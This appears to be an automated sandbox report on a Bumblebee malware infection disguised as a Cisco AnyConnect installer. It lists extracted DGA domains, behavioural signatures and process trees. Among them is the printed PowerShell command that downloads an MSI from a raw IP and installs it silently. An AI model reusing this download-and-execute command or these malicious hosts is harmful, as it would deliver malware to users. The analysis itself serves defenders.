Analysis
-
max time kernel
209s -
max time network
210s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
submitted
06-12-2024 10:28
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
http://apt-as.com/linker/jump.php?sid=29&url=h%2574t%2570%253A%252F%252F%2564%256F%256D%252E%2566i%256C%2565%256Fu%2574%2570u%2574%252E%2570%2572%256F%2523%2566%2539%252D%2547%2530%252D%255A%256A
Resource
win10v2004-20241007-en
General
Malware Config
Extracted
bumblebee
1
-
dga
45urhm0ldgxb.live
gx6xly9rp6vl.live
zv46ga4ntybq.live
7n1hfolmrnbl.live
vivh2xlt9i6q.live
97t3nh4kk510.live
kbkdtwucfl40.live
qk6a1ahb63uz.live
whko7loy7h5z.live
dad1zg44n0bn.live
7xwz4hw8dts9.live
ovekd5n3gklq.live
amwnef8mjo4v.live
e7ivqfhnss0x.live
rjql4nicl6bg.live
4mo318kk29i4.live
zpo18lm8vg1x.live
jc51pt290y0n.live
rg26t2dc4hf4.live
qw9a58vunuja.live
ugm94zjzl5nl.live
mckag832orba.live
pdw0v9voxlxr.live
m4tx2apfmoxo.live
n2uc737ef71m.live
hkk3112645hz.live
ugko9g5ipa4o.live
8wgq2x4dybx9.live
h81fx7sj8srr.live
a4tgoqi1cm8x.live
kse2q7uxyrwp.live
mfwnbxvt9qme.live
x99ahfftf28l.live
9n6bmko47gxe.live
6l96lk6edlyf.live
st5j8zqdrppf.live
dxjeucbj4p0j.live
bnpuxnov7lhr.live
a8bxv8lqe1m0.live
yczi2ujcyyro.live
sbeo0cztn1kh.live
o337yf9fh4bf.live
zoki7ma89z7b.live
x2r9bglz76r7.live
wi1w9yu1vush.live
mtqdvzkai700.live
r6o2sj70m85m.live
ut6qohwra5lm.live
9yi98fh7usy1.live
kkpjp9jzbzba.live
whvffwd7zphw.live
uztmazsno4y5.live
i3iubj73c21c.live
b72o02l2ilc6.live
wom4o4cutfx6.live
fek3qya20lid.live
nhkvd56j82xw.live
midyxlu6b22f.live
vp9c9rziba2a.live
rkffupb7i1gv.live
8u7r35mu2e4g.live
3c2xflq8mztc.live
wswis3sptby1.live
9rib57u1zu3c.live
sv3pldc5gkdl.live
bmdcn5celetq.live
y3mpywhmem7t.live
avwtkc23ffmw.live
nvgirtryox1z.live
3rlfa7w0bz37.live
vy9u47oyzltu.live
ysdwk0l8xass.live
tbt0aqol3sp2.live
xqqoo0a8zk0w.live
nevkq7lku38l.live
5u42wjin0vfz.live
y626kbnryktm.live
5k9b8nmc0x8r.live
i18t3jshekua.live
4hk1bcnxbse0.live
si00bu9fv5he.live
g3in90m5caz2.live
f6s4n6w41oov.live
sgl7og2qswmm.live
vrrbk7ykz8h1.live
zl7bmlfq8n9w.live
qydstwmw2imy.live
y9s73mnvurxr.live
7zggkh833im1.live
cvnsiogvl3kt.live
enf3gev34gis.live
doj6z5i9g803.live
zsm954jr5ek4.live
6z96z4mk84dc.live
e0et68offggh.live
au97foecnlrm.live
3ibjpmls5x46.live
mmmpa1byo300.live
3e60zvd64d8y.live
zt3nnzr70hn0.live
-
dga_seed
7834006444057268685
-
domain_length
12
-
num_dga_domains
300
-
port
443
Signatures
-
Bumblebee family
-
Blocklisted process makes network request 8 IoCs
flow pid Process 80 4916 powershell.exe 85 4224 MsiExec.exe 87 4224 MsiExec.exe 89 4224 MsiExec.exe 94 4224 MsiExec.exe 99 4224 MsiExec.exe 100 4224 MsiExec.exe 101 4224 MsiExec.exe -
pid Process 4916 powershell.exe -
Loads dropped DLL 8 IoCs
pid Process 5012 MsiExec.exe 5012 MsiExec.exe 5012 MsiExec.exe 5012 MsiExec.exe 5012 MsiExec.exe 5012 MsiExec.exe 5012 MsiExec.exe 4224 MsiExec.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 86 api.ipify.org 87 api.ipify.org -
Mark of the Web detected: This indicates that the page was originally saved or cloned. 1 IoCs
flow ioc 22 https://www.firewall.cx/downloads/cisco-tools-a-applications/cisco-anyconnect-secure-mobility-client-v4-9-0195.html -
Drops file in Windows directory 14 IoCs
description ioc Process File created C:\Windows\Installer\e59135f.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI173C.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI17EA.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI15C3.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI176C.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{5B2892F8-A2A6-49F8-BA11-A5C777D0FEE1} msiexec.exe File opened for modification C:\Windows\Installer\MSI13FB.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI15B3.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI16AF.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\e59135f.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI1506.tmp msiexec.exe -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings msedge.exe -
Suspicious behavior: EnumeratesProcesses 17 IoCs
pid Process 2428 msedge.exe 2428 msedge.exe 4720 msedge.exe 4720 msedge.exe 3108 identity_helper.exe 3108 identity_helper.exe 1832 msedge.exe 1832 msedge.exe 4916 powershell.exe 4916 powershell.exe 4916 powershell.exe 4816 msiexec.exe 4816 msiexec.exe 1580 msedge.exe 1580 msedge.exe 1580 msedge.exe 1580 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
pid Process 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe -
Suspicious use of AdjustPrivilegeToken 55 IoCs
description pid Process Token: SeRestorePrivilege 3584 7zG.exe Token: 35 3584 7zG.exe Token: SeSecurityPrivilege 3584 7zG.exe Token: SeSecurityPrivilege 3584 7zG.exe Token: SeDebugPrivilege 4916 powershell.exe Token: SeShutdownPrivilege 3916 msiexec.exe Token: SeIncreaseQuotaPrivilege 3916 msiexec.exe Token: SeSecurityPrivilege 4816 msiexec.exe Token: SeCreateTokenPrivilege 3916 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3916 msiexec.exe Token: SeLockMemoryPrivilege 3916 msiexec.exe Token: SeIncreaseQuotaPrivilege 3916 msiexec.exe Token: SeMachineAccountPrivilege 3916 msiexec.exe Token: SeTcbPrivilege 3916 msiexec.exe Token: SeSecurityPrivilege 3916 msiexec.exe Token: SeTakeOwnershipPrivilege 3916 msiexec.exe Token: SeLoadDriverPrivilege 3916 msiexec.exe Token: SeSystemProfilePrivilege 3916 msiexec.exe Token: SeSystemtimePrivilege 3916 msiexec.exe Token: SeProfSingleProcessPrivilege 3916 msiexec.exe Token: SeIncBasePriorityPrivilege 3916 msiexec.exe Token: SeCreatePagefilePrivilege 3916 msiexec.exe Token: SeCreatePermanentPrivilege 3916 msiexec.exe Token: SeBackupPrivilege 3916 msiexec.exe Token: SeRestorePrivilege 3916 msiexec.exe Token: SeShutdownPrivilege 3916 msiexec.exe Token: SeDebugPrivilege 3916 msiexec.exe Token: SeAuditPrivilege 3916 msiexec.exe Token: SeSystemEnvironmentPrivilege 3916 msiexec.exe Token: SeChangeNotifyPrivilege 3916 msiexec.exe Token: SeRemoteShutdownPrivilege 3916 msiexec.exe Token: SeUndockPrivilege 3916 msiexec.exe Token: SeSyncAgentPrivilege 3916 msiexec.exe Token: SeEnableDelegationPrivilege 3916 msiexec.exe Token: SeManageVolumePrivilege 3916 msiexec.exe Token: SeImpersonatePrivilege 3916 msiexec.exe Token: SeCreateGlobalPrivilege 3916 msiexec.exe Token: SeRestorePrivilege 4816 msiexec.exe Token: SeTakeOwnershipPrivilege 4816 msiexec.exe Token: SeRestorePrivilege 4816 msiexec.exe Token: SeTakeOwnershipPrivilege 4816 msiexec.exe Token: SeRestorePrivilege 4816 msiexec.exe Token: SeTakeOwnershipPrivilege 4816 msiexec.exe Token: SeRestorePrivilege 4816 msiexec.exe Token: SeTakeOwnershipPrivilege 4816 msiexec.exe Token: SeRestorePrivilege 4816 msiexec.exe Token: SeTakeOwnershipPrivilege 4816 msiexec.exe Token: SeRestorePrivilege 4816 msiexec.exe Token: SeTakeOwnershipPrivilege 4816 msiexec.exe Token: SeRestorePrivilege 4816 msiexec.exe Token: SeTakeOwnershipPrivilege 4816 msiexec.exe Token: SeRestorePrivilege 4816 msiexec.exe Token: SeTakeOwnershipPrivilege 4816 msiexec.exe Token: SeRestorePrivilege 4816 msiexec.exe Token: SeTakeOwnershipPrivilege 4816 msiexec.exe -
Suspicious use of FindShellTrayWindow 34 IoCs
pid Process 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 3584 7zG.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe 4720 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4720 wrote to memory of 4128 4720 msedge.exe 82 PID 4720 wrote to memory of 4128 4720 msedge.exe 82 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 4576 4720 msedge.exe 83 PID 4720 wrote to memory of 2428 4720 msedge.exe 84 PID 4720 wrote to memory of 2428 4720 msedge.exe 84 PID 4720 wrote to memory of 1140 4720 msedge.exe 85 PID 4720 wrote to memory of 1140 4720 msedge.exe 85 PID 4720 wrote to memory of 1140 4720 msedge.exe 85 PID 4720 wrote to memory of 1140 4720 msedge.exe 85 PID 4720 wrote to memory of 1140 4720 msedge.exe 85 PID 4720 wrote to memory of 1140 4720 msedge.exe 85 PID 4720 wrote to memory of 1140 4720 msedge.exe 85 PID 4720 wrote to memory of 1140 4720 msedge.exe 85 PID 4720 wrote to memory of 1140 4720 msedge.exe 85 PID 4720 wrote to memory of 1140 4720 msedge.exe 85 PID 4720 wrote to memory of 1140 4720 msedge.exe 85 PID 4720 wrote to memory of 1140 4720 msedge.exe 85 PID 4720 wrote to memory of 1140 4720 msedge.exe 85 PID 4720 wrote to memory of 1140 4720 msedge.exe 85 PID 4720 wrote to memory of 1140 4720 msedge.exe 85 PID 4720 wrote to memory of 1140 4720 msedge.exe 85 PID 4720 wrote to memory of 1140 4720 msedge.exe 85 PID 4720 wrote to memory of 1140 4720 msedge.exe 85 PID 4720 wrote to memory of 1140 4720 msedge.exe 85 PID 4720 wrote to memory of 1140 4720 msedge.exe 85
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://apt-as.com/linker/jump.php?sid=29&url=h%2574t%2570%253A%252F%252F%2564%256F%256D%252E%2566i%256C%2565%256Fu%2574%2570u%2574%252E%2570%2572%256F%2523%2566%2539%252D%2547%2530%252D%255A%256A1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4720 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xe0,0x108,0x7ffdfeac46f8,0x7ffdfeac4708,0x7ffdfeac47182⤵PID:4128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,6376100622457675208,7476399187416802021,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2328 /prefetch:22⤵PID:4576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,6376100622457675208,7476399187416802021,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:2428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,6376100622457675208,7476399187416802021,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:82⤵PID:1140
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6376100622457675208,7476399187416802021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:12⤵PID:3408
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6376100622457675208,7476399187416802021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:12⤵PID:3940
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6376100622457675208,7476399187416802021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:12⤵PID:3644
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,6376100622457675208,7476399187416802021,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5344 /prefetch:82⤵PID:4420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,6376100622457675208,7476399187416802021,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5344 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6376100622457675208,7476399187416802021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:12⤵PID:4768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6376100622457675208,7476399187416802021,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:12⤵PID:2892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6376100622457675208,7476399187416802021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5404 /prefetch:12⤵PID:3956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6376100622457675208,7476399187416802021,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3588 /prefetch:12⤵PID:4740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6376100622457675208,7476399187416802021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1952 /prefetch:12⤵PID:1660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6376100622457675208,7476399187416802021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:12⤵PID:720
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6376100622457675208,7476399187416802021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2724 /prefetch:12⤵PID:3724
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2088,6376100622457675208,7476399187416802021,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5352 /prefetch:82⤵PID:4608
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,6376100622457675208,7476399187416802021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6040 /prefetch:12⤵PID:3828
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2088,6376100622457675208,7476399187416802021,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5676 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1832
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,6376100622457675208,7476399187416802021,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:1580
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:448
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1148
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3092
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap8725:110:7zEvent274041⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3584
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest "http://38.180.195.168/CiscoAnyconnectInstaller.msi" -OutFile "C:\Users\Admin\AppData\Roaming\Install.msi";msiexec.exe /i 'C:\Users\Admin\AppData\Roaming\Install.msi' /qn1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4916 -
C:\Windows\system32\msiexec.exe"C:\Windows\system32\msiexec.exe" /i C:\Users\Admin\AppData\Roaming\Install.msi /qn2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3916
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4816 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 50950614AAA11BD9A3CFD37A27B2BB7D2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5012
-
-
C:\Windows\System32\MsiExec.exe"C:\Windows\System32\MsiExec.exe" /Y "C:\Users\Admin\AppData\Roaming\BmgqLbJUHL.dll"2⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:4224
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD50a9dc42e4013fc47438e96d24beb8eff
SHA1806ab26d7eae031a58484188a7eb1adab06457fc
SHA25658d66151799526b3fa372552cd99b385415d9e9a119302b99aadc34dd51dd151
SHA512868d6b421ae2501a519595d0c34ddef25b2a98b082c5203da8349035f1f6764ddf183197f1054e7e86a752c71eccbc0649e515b63c55bc18cf5f0592397e258f
-
Filesize
152B
MD561cef8e38cd95bf003f5fdd1dc37dae1
SHA111f2f79ecb349344c143eea9a0fed41891a3467f
SHA256ae671613623b4477fbd5daf1fd2d148ae2a09ddcc3804b2b6d4ffcb60b317e3e
SHA5126fb9b333fe0e8fde19fdd0bd01a1990a4e60a87c0a02bc8297da1206e42f8690d06b030308e58c862e9e77714a585eed7cc1627590d99a10aeb77fc0dd3d864d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize216B
MD599dab30c47cc14eb3f4074f0d8f10b51
SHA105b360b231b444b60cbbbe10b0d71ef4ab1d7c50
SHA2567f8bcc3715d35d6c02834233d636260096b8bdd51293a89ad21bbe9f0ef09e74
SHA51299dd9c09d15069e842fd9c33664f0dbd0267840994ef16f00a71795ef367939293c876b8c7c56dac7527861f8aee25fa0f96a5a1b4e4eacf15aba515a1ccb669
-
